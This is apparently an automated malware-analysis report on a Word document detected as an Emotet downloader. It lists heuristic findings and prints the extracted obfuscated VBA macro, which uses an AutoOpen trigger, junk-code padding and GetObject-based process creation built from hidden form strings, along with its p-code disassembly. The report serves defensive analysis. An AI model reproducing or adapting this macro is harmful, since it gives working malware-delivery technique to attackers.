MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-6921772-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6921772-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set GQQDAU = GetObject(WUQxADAA.j_AZAGw.ControlSource + TAAA_kG.LAA11xc1 + WUQxADAA.j_AZAGw.ControlTipText) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 23206 bytes |
SHA-256: dc75ca47709dd14a69150e4084cdf0060ad80c5fa5e3b3d27c052557d35d2f79 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Q_AkcAkA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "WUQxADAA"
Attribute VB_Base = "0{EDDA9DAC-408E-4843-AF27-7384E7F6368D}{2B1BF93A-6D7E-4E96-8923-9EC6F19CB122}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "TAAA_kG"
Attribute VB_Base = "0{3445A202-EEF3-4DF1-B582-612A299257CB}{145C37EC-2581-4147-A02A-5D7EE68F3941}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UAc4BAUC"
Function BDoxcw()
GABBZDAA _
= CStr(jDAAAA1 + 190729951 + 181226180 _
* CDate(QDXDkxAG * ChrW(700759090 / CDate(SCACAU)))) _
+ Rnd(i_QcDA + (937090775 + 238143454) * _
CDate(EAAACAU * CVar(400206085 / CDate(CAAAc_c))))
dcDZAk _
= CStr(hAAAAUA + 620314115 + 356060549 _
* CDate(NQAAQA1 * ChrW(354359865 / CDate(G_ABcUU_)))) _
+ Rnd(YA1BQC1o + (220335635 + 416278849) * _
CDate(zCD_AX * CVar(558136014 / CDate(oAAZ1ow_))))
End Function
Function LQX4_B()
DZQDAA _
= CStr(iAcDUw_x + 905825893 + 608696461 _
* CDate(ho4A4Z * ChrW(41191649 / CDate(dQGwkcAA)))) _
+ Rnd(VGBQAo + (14604649 + 341751214) * _
CDate(qCBw1QX * CVar(889306790 / CDate(b4DDkA1))))
zAACAD _
= CStr(cc1AAQ + 37352381 + 771103769 _
* CDate(ZAGZ_UZ * ChrW(692480074 / CDate(kAZoco)))) _
+ Rnd(rAXUXAUQ + (456402844 + 111663180) * _
CDate(YcBAQ1 * CVar(379311495 / CDate(bABcw4A))))
End Function
Sub autoopen()
zoQwoAk
End Sub
Function zoQwoAk()
On Error Resume Next
RXXGAAA1 _
= CStr(rAUkUQA + 379591373 + 928698819 _
* CDate(QUDAAAZA * ChrW(570199159 / CDate(ucBUAABk)))) _
+ Rnd(EwxA_CA + (387651117 + 155711092) * _
CDate(UAxADZU * CVar(110895424 / CDate(wQkDAB1))))
GoAwxAQ _
= CStr(GXAAAD_X + 884979737 + 729182960 _
* CDate(oAwXAXx * ChrW(723981348 / CDate(ScDA_QQ)))) _
+ Rnd(PXAwUUo + (76548504 + 684256094) * _
CDate(oUAcAA * CVar(215809192 / CDate(NA_xABA))))
kBA_ZAkA _
= CStr(wAcxABc + 174302383 + 918319308 _
* CDate(LXAADUoA * ChrW(30991413 / CDate(JQA1DwkA)))) _
+ Rnd(nBXxkAAc + (674377775 + 911927971) * _
CDate(F_UQGkBA * CVar(400048199 / CDate(GkwkQXAA))))
Set GQQDAU = GetObject(WUQxADAA.j_AZAGw.ControlSource + TAAA_kG.LAA11xc1 + WUQxADAA.j_AZAGw.ControlTipText)
D_XoQ_ _
= CStr(VAA1_ACB + 93403524 + 460192137 _
* CDate(rAUxkDD * ChrW(771421600 / CDate(wBAAUXA)))) _
+ Rnd(n4UDcwBw + (273103484 + 750859478) * _
CDate(YcBAAD * CVar(157411478 / CDate(FQDADQC))))
OkDAUAA _
= CStr(oBxAA4oA + 853212766 + 449656934 _
* CDate(oBGBAA * ChrW(765522112 / CDate(qQDBUQA)))) _
+ Rnd(fAADAA_ + (80686828 + 178295306) * _
CDate(PAAAAZ * CVar(279102898 / CDate(Z_AA_C))))
If 717640 = 717640 Then
RAcAZk _
= CStr(B1DoUUBB + 491518068 + 587460519 _
* CDate(joAAxBZ4 * ChrW(328214039 / CDate(MAAAoA1o)))) _
+ Rnd(EUAADBA + (293132920 + 361493833) * _
CDate(kwAA4A * CVar(50622193 / CDate(CBABBQD))))
B_AUAA4 _
= CStr(tDBAG1CA + 118868190 + 736578539 _
* CDate(sUkkwQ * ChrW(147753608 / CDate(N4Q1AD)))) _
+ Rnd(EUCDUA + (292467883 + 532802914) * _
CDate(jUAUGQD * CVar(172320648 / CDate(PDB_AA))))
GQQDAU. _
ShOwWiNdOw = WUQxADAA.UAAZUAQ + WUQxADAA.UAAZUAQ + WUQxADAA.UAAZUAQ
oA4AwxAD _
= CStr(lAAxDc + 602007023 + 714301208 _
* CDate(FcAQoXBZ * ChrW(118891988 / CDate(JXAUkZA)))) _
+ Rnd(dAXkxDAc + (940926601 + 445016321) * _
CDate(HABQcBA * CVar(42268826 / CDate(LX4QAQ))))
rAUAAA _
= CStr(MwAooAc + 136537821 + 165874992 _
* CDate(wABA1AAx * ChrW(277416250 / CDate(jB1QkoXk)))) _
+ Rnd(IGBAAxAA + (738980853 + 406256549) * _
CDate(j_D1UUk * CVar(269711165 / CDate(UAQABAA))))
End If
Zk4wAAQA _
= CStr(nGwAAC + 563908943 + 741464916 _
* CDate(jUACAA * ChrW(846945962 / CDate(zcAA1XAU)))) _
+ Rnd(fUcBxAD + (481768994 + 316618343) * _
CDate(Z_AAAQcG * CVar(163075493 / CDate(RQ_DBoA))))
JAXo1_A _
= CStr(jxAkZAoA + 235858960 + 230081612 _
* CDate(CAAQ_D * ChrW(203911520 / CDate(fUkAAZw)))) _
+ Rnd(CA4x4G + (827370515 + 268071626) * _
CDate(mXABA_kA * CVar(767718029 / CDate(SBQwDAGG))))
wkkDCD _
= CStr(zAkDoXA + 739356462 + 243143816 _
* CDate(ZBQA_xA * ChrW(712114090 / CDate(UxAwAAQ)))) _
+ Rnd(jAAAQDU + (233523437 + 609308001) * _
CDate(GBUQB1U * CVar(501996064 / CDate(aG_A4A))))
Call GetObject(WUQxADAA.j_AZAGw.ControlSource + TAAA_kG.XDcXAcBB + WUQxADAA.j_AZAGw.Text).Create((WUQxADAA.j_AZAGw + TAAA_kG.HAAACAxA + WUQxADAA.j_AZAGw.Text + TAAA_kG.PxAA1AAB + WUQxADAA.j_AZAGw.ControlSource + WUQxADAA.j_AZAGw.Text + TAAA_kG.ABQQBGA + WUQxADAA.j_AZAGw.Text + WUQxADAA.j_AZAGw.Text + TAAA_kG.NGAAAQc + WUQxADAA.j_AZAGw.ControlTipText + TAAA_kG.fZABAX + WUQxADAA.j_AZAGw.ControlTipText), jXBAGAk, GQQDAU, WUQxADAA.j_AZAGw)
bQQXBQA _
= CStr(VGQAAQ + 396633185 + 990846537 _
* CDate(GAA_QAB * ChrW(474232350 / CDate(Dox4UAU)))) _
+ Rnd(ScA4D1DQ + (869234290 + 896373727) * _
CDate(rxxAAA1 * CVar(982789373 / CDate(PQBAQG))))
a_AADQkQ _
= CStr(IA1DAAA + 702976396 + 559149450 _
* CDate(iUQCooA * ChrW(975523558 / CDate(EAUDXAwA)))) _
+ Rnd(noo_Uxk + (730047543 + 452089032) * _
CDate(XDAAAU * CVar(98654394 / CDate(qAAGDDB1))))
End Function
Function cGCUUZ1A()
wXQCB1AC _
= CStr(NGoAGAA + 969905312 + 658546151 _
* CDate(jcADkxQA * ChrW(257594106 / CDate(tXADAk4U)))) _
+ Rnd(UUBAQA + (100187446 + 62235198) * _
CDate(MDAAwDBU * CVar(255069100 / CDate(QAAQGAB))))
GAoACAA _
= CStr(HQcAUAAB + 904853781 + 396505614 _
* CDate(sB1BA4A * ChrW(381584115 / CDate(rUDoAAAx)))) _
+ Rnd(FA1QADA + (72924047 + 557382462) * _
CDate(OkAA4BAA * CVar(29165679 / CDate(E1CBGBAA))))
jUAX1w _
= CStr(D4XQwXAA + 743940500 + 851226700 _
* CDate(tXZcwQA * ChrW(212743773 / CDate(roDAXA)))) _
+ Rnd(YD4BCA + (590248698 + 504661523) * _
CDate(ckAUwDAZ * CVar(206696442 / CDate(aUCZAQ1A))))
End Function
Function PZUUAAwA()
VAo_1AX _
= CStr(XDUCCk + 353757792 + 106265375 _
* CDate(jXBUADC * ChrW(588451275 / CDate(kAGAAB)))) _
+ Rnd(nxAA4AA + (569303758 + 24294493) * _
CDate(uA4AAUA * CVar(854877763 / CDate(TABGUQ))))
HAUQ4A _
= CStr(bQDAkAAB + 752547304 + 840630723 _
* CDate(E4BDAcA1 * ChrW(910981728 / CDate(fGA41ZXX)))) _
+ Rnd(HABBGZG_ + (478574097 + 707207927) * _
CDate(iAQC1QAD * CVar(840588692 / CDate(FAwBAD))))
WX_AGU4 _
= CStr(fZA_UU + 933632752 + 392434841 _
* CDate(OBUAAw * ChrW(113399025 / CDate(FxUGADD)))) _
+ Rnd(AUBD1DoA + (120267340 + 154460834) * _
CDate(SAAxB4x * CVar(132949423 / CDate(cADoDw))))
End Function
' Processing file: /opt/analyzer/scan_staging/9f78cf5c7dc54e06b2557e447b31d257.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Q_AkcAkA - 1106 bytes
' Macros/VBA/WUQxADAA - 1158 bytes
' Macros/VBA/TAAA_kG - 1158 bytes
' Macros/VBA/UAc4BAUC - 8984 bytes
' Line #0:
' FuncDefn (Function UAc4BAUC())
' Line #1:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld GABBZDAA
' LitDI4 0x4EDF 0x0B5E
' Add
' LitDI4 0x4AC4 0x0ACD
' Ld jDAAAA1
' LitDI4 0xBC32 0x29C4
' Ld QDXDkxAG
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld SCACAU
' LitDI4 0xDED7 0x37DA
' LitDI4 0xC7DE 0x0E31
' Add
' Paren
' Ld i_QcDA
' LitDI4 0xA905 0x17DA
' Ld EAAACAU
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St BDoxcw
' Line #2:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld dcDZAk
' LitDI4 0x3E03 0x24F9
' Add
' LitDI4 0x0D85 0x1539
' Ld hAAAAUA
' LitDI4 0x1A39 0x151F
' Ld NQAAQA1
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld G_ABcUU_
' LitDI4 0x0E13 0x0D22
' LitDI4 0xE941 0x18CF
' Add
' Paren
' Ld YA1BQC1o
' LitDI4 0x7ACE 0x2144
' Ld zCD_AX
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St CAAAc_c
' Line #3:
' EndFunc
' Line #4:
' FuncDefn (Function oAAZ1ow_())
' Line #5:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld DZQDAA
' LitDI4 0xCE65 0x35FD
' Add
' LitDI4 0xF88D 0x2447
' Ld iAcDUw_x
' LitDI4 0x88E1 0x0274
' Ld ho4A4Z
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld dQGwkcAA
' LitDI4 0xD969 0x00DE
' LitDI4 0xB5AE 0x145E
' Add
' Paren
' Ld VGBQAo
' LitDI4 0xBEA6 0x3501
' Ld qCBw1QX
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St LQX4_B
' Line #6:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld zAACAD
' LitDI4 0xF3BD 0x0239
' Add
' LitDI4 0x1C19 0x2DF6
' Ld cc1AAQ
' LitDI4 0x684A 0x2946
' Ld ZAGZ_UZ
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld kAZoco
' LitDI4 0x279C 0x1B34
' LitDI4 0xD84C 0x06A7
' Add
' Paren
' Ld rAXUXAUQ
' LitDI4 0xD587 0x169B
' Ld YcBAQ1
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St b4DDkA1
' Line #7:
' EndFunc
' Line #8:
' FuncDefn (Sub bABcw4A())
' Line #9:
' ArgsCall autoopen 0x0000
' Line #10:
' EndSub
' Line #11:
' FuncDefn (Function autoopen())
' Line #12:
' OnError (Resume Next)
' Line #13:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld RXXGAAA1
' LitDI4 0x1ACD 0x16A0
' Add
' LitDI4 0xD1C3 0x375A
' Ld rAUkUQA
' LitDI4 0x8C77 0x21FC
' Ld QUDAAAZA
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld ucBUAABk
' LitDI4 0x162D 0x171B
' LitDI4 0xF674 0x0947
' Add
' Paren
' Ld EwxA_CA
' LitDI4 0x2140 0x069C
' Ld UAxADZU
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St zoQwoAk
' Line #14:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld GoAwxAQ
' LitDI4 0xB819 0x34BF
' Add
' LitDI4 0x72F0 0x2B76
' Ld GXAAAD_X
' LitDI4 0x1424 0x2B27
' Ld oAwXAXx
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld ScDA_QQ
' LitDI4 0x0998 0x0490
' LitDI4 0xEB5E 0x28C8
' Add
' Paren
' Ld PXAwUUo
' LitDI4 0xFCA8 0x0CDC
' Ld oUAcAA
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St wQkDAB1
' Line #15:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld kBA_ZAkA
' LitDI4 0xA4AF 0x0A63
' Add
' LitDI4 0x70CC 0x36BC
' Ld wAcxABc
' LitDI4 0xE435 0x01D8
' Ld LXAADUoA
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld JQA1DwkA
' LitDI4 0x302F 0x2832
' LitDI4 0xEAA3 0x365A
' Add
' Paren
' Ld nBXxkAAc
' LitDI4 0x4047 0x17D8
' Ld F_UQGkBA
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St NA_xABA
' Line #16:
' SetStmt
' Ld TAAA_kG
' MemLd GetObject
' MemLd j_AZAGw
' Ld MSForms
' MemLd ControlSource
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Form
' Add
' ArgsLd GQQDAU 0x0001
' Set GkwkQXAA
' Line #17:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld D_XoQ_
' LitDI4 0x3984 0x0591
' Add
' LitDI4 0xF989 0x1B6D
' Ld VAA1_ACB
' LitDI4 0xF5A0 0x2DFA
' Ld rAUxkDD
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld wBAAUXA
' LitDI4 0x3A7C 0x1047
' LitDI4 0x34D6 0x2CC1
' Add
' Paren
' Ld n4UDcwBw
' LitDI4 0xE896 0x0961
' Ld YcBAAD
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St LAA11xc1
' Line #18:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld OkDAUAA
' LitDI4 0xFE5E 0x32DA
' Add
' LitDI4 0x3866 0x1ACD
' Ld oBxAA4oA
' LitDI4 0xF0C0 0x2DA0
' Ld oBGBAA
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld qQDBUQA
' LitDI4 0x2EEC 0x04CF
' LitDI4 0x920A 0x0AA0
' Add
' Paren
' Ld fAADAA_
' LitDI4 0xC5B2 0x10A2
' Ld PAAAAZ
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St FQDADQC
' Line #19:
' LitDI4 0xF348 0x000A
' LitDI4 0xF348 0x000A
' Eq
' IfBlock
' Line #20:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld RAcAZk
' LitDI4 0xF874 0x1D4B
' Add
' LitDI4 0xEFA7 0x2303
' Ld B1DoUUBB
' LitDI4 0x2617 0x1390
' Ld joAAxBZ4
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld MAAAoA1o
' LitDI4 0xDA78 0x1178
' LitDI4 0xF549 0x158B
' Add
' Paren
' Ld EUAADBA
' LitDI4 0x6EF1 0x0304
' Ld kwAA4A
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St Z_AA_C
' Line #21:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld B_AUAA4
' LitDI4 0xC8DE 0x0715
' Add
' LitDI4 0x4BEB 0x2BE7
' Ld tDBAG1CA
' LitDI4 0x8A88 0x08CE
' Ld sUkkwQ
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld N4Q1AD
' LitDI4 0xB4AB 0x116E
' LitDI4 0xED62 0x1FC1
' Add
' Paren
' Ld EUCDUA
' LitDI4 0x6788 0x0A45
' Ld jUAUGQD
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St CBABBQD
' Line #22:
' LineCont 0x0004 02 00 00 00
' Ld TAAA_kG
' MemLd ShOwWiNdOw
' Ld TAAA_kG
' MemLd ShOwWiNdOw
' Add
' Ld TAAA_kG
' MemLd ShOwWiNdOw
' Add
' Ld GkwkQXAA
' MemSt PDB_AA
' Line #23:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld oA4AwxAD
' LitDI4 0xE5EF 0x23E1
' Add
' LitDI4 0x5F18 0x2A93
' Ld lAAxDc
' LitDI4 0x25D4 0x0716
' Ld FcAQoXBZ
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld JXAUkZA
' LitDI4 0x6689 0x3815
' LitDI4 0x6901 0x1A86
' Add
' Paren
' Ld dAXkxDAc
' LitDI4 0xF89A 0x0284
' Ld HABQcBA
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St UAAZUAQ
' Line #24:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld rAUAAA
' LitDI4 0x66DD 0x0823
' Add
' LitDI4 0x0D30 0x09E3
' Ld MwAooAc
' LitDI4 0x093A 0x1089
' Ld wABA1AAx
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld jB1QkoXk
' LitDI4 0xF3F5 0x2C0B
' LitDI4 0xFBA5 0x1836
' Add
' Paren
' Ld IGBAAxAA
' LitDI4 0x773D 0x1013
' Ld j_D1UUk
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St LX4QAQ
' Line #25:
' EndIfBlock
' Line #26:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld Zk4wAAQA
' LitDI4 0x914F 0x219C
' Add
' LitDI4 0xDB54 0x2C31
' Ld nGwAAC
' LitDI4 0x5EAA 0x327B
' Ld jUACAA
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld zcAA1XAU
' LitDI4 0x3622 0x1CB7
' LitDI4 0x3667 0x12DF
' Add
' Paren
' Ld fUcBxAD
' LitDI4 0x55A5 0x09B8
' Ld Z_AAAQcG
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St UAQABAA
' Line #27:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld JAXo1_A
' LitDI4 0xEC10 0x0E0E
' Add
' LitDI4 0xC44C 0x0DB6
' Ld jxAkZAoA
' LitDI4 0x7160 0x0C27
' Ld CAAQ_D
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld fUkAAZw
' LitDI4 0xAC13 0x3150
' LitDI4 0x72CA 0x0FFA
' Add
' Paren
' Ld CA4x4G
' LitDI4 0x728D 0x2DC2
' Ld mXABA_kA
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St RQ_DBoA
' Line #28:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld wkkDCD
' LitDI4 0xAF2E 0x2C11
' Add
' LitDI4 0x1488 0x0E7E
' Ld zAkDoXA
' LitDI4 0xFFAA 0x2A71
' Ld ZBQA_xA
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld UxAwAAQ
' LitDI4 0x48ED 0x0DEB
' LitDI4 0x4D61 0x2451
' Add
' Paren
' Ld jAAAQDU
' LitDI4 0xDA20 0x1DEB
' Ld GBUQB1U
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St SBQwDAGG
' Line #29:
' Ld TAAA_kG
' MemLd GetObject
' Ld MSForms
' MemLd Create
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Text
' Add
' Ld MSForms
' MemLd HAAACAxA
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd j_AZAGw
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Text
' Add
' Ld MSForms
' MemLd PxAA1AAB
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Text
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Text
' Add
' Ld MSForms
' MemLd ABQQBGA
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Form
' Add
' Ld MSForms
' MemLd NGAAAQc
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Form
' Add
' Paren
' Ld fZABAX
' Ld GkwkQXAA
' Ld TAAA_kG
' MemLd GetObject
' Ld TAAA_kG
' MemLd GetObject
' MemLd j_AZAGw
' Ld MSForms
' MemLd aG_A4A
' Add
' Ld TAAA_kG
' MemLd GetObject
' MemLd Text
' Add
' ArgsLd GQQDAU 0x0001
' ArgsMemCall (Call) XDcXAcBB 0x0004
' Line #30:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld bQQXBQA
' LitDI4 0x2461 0x17A4
' Add
' LitDI4 0x1E49 0x3B0F
' Ld VGQAAQ
' LitDI4 0x361E 0x1C44
' Ld GAA_QAB
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld Dox4UAU
' LitDI4 0x7672 0x33CF
' LitDI4 0x93DF 0x356D
' Add
' Paren
' Ld ScA4D1DQ
' LitDI4 0x2CFD 0x3A94
' Ld rxxAAA1
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St jXBAGAk
' Line #31:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld a_AADQkQ
' LitDI4 0x918C 0x29E6
' Add
' LitDI4 0xF18A 0x2153
' Ld IA1DAAA
' LitDI4 0x4EE6 0x3A25
' Ld iUQCooA
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld EAUDXAwA
' LitDI4 0xA437 0x2B83
' LitDI4 0x54C8 0x1AF2
' Add
' Paren
' Ld noo_Uxk
' LitDI4 0x58BA 0x05E1
' Ld XDAAAU
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St PQBAQG
' Line #32:
' EndFunc
' Line #33:
' FuncDefn (Function qAAGDDB1())
' Line #34:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld wXQCB1AC
' LitDI4 0x94A0 0x39CF
' Add
' LitDI4 0x9DE7 0x2740
' Ld NGoAGAA
' LitDI4 0x92FA 0x0F5A
' Ld jcADkxQA
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld tXADAk4U
' LitDI4 0xBD36 0x05F8
' LitDI4 0xA23E 0x03B5
' Add
' Paren
' Ld UUBAQA
' LitDI4 0x0BAC 0x0F34
' Ld MDAAwDBU
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St cGCUUZ1A
' Line #35:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld GAoACAA
' LitDI4 0xF915 0x35EE
' Add
' LitDI4 0x320E 0x17A2
' Ld HQcAUAAB
' LitDI4 0x82F3 0x16BE
' Ld sB1BA4A
' Coerce (Date)
' Div
' ArgsLd ChrW 0x0001
' Mul
' Coerce (Date)
' Mul
' Add
' Coerce (Str)
' Ld rUDoAAAx
' LitDI4 0xBB8F 0x0458
' LitDI4 0xFB3E 0x2138
' Add
' Paren
' Ld FA1QADA
' LitDI4 0x086F 0x01BD
' Ld OkAA4BAA
' Coerce (Date)
' Div
' Coerce (Var)
' Mul
' Coerce (Date)
' Mul
' Add
' ArgsLd Rnd 0x0001
' Add
' St QAAQGAB
' Line #36:
' LineCont 0x0010 01 00 00 00 09 00 00 00 19 00 00 00 24 00 00 00
' Ld jUAX1w
' LitDI4 0xA194 0x2C57
' Add
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.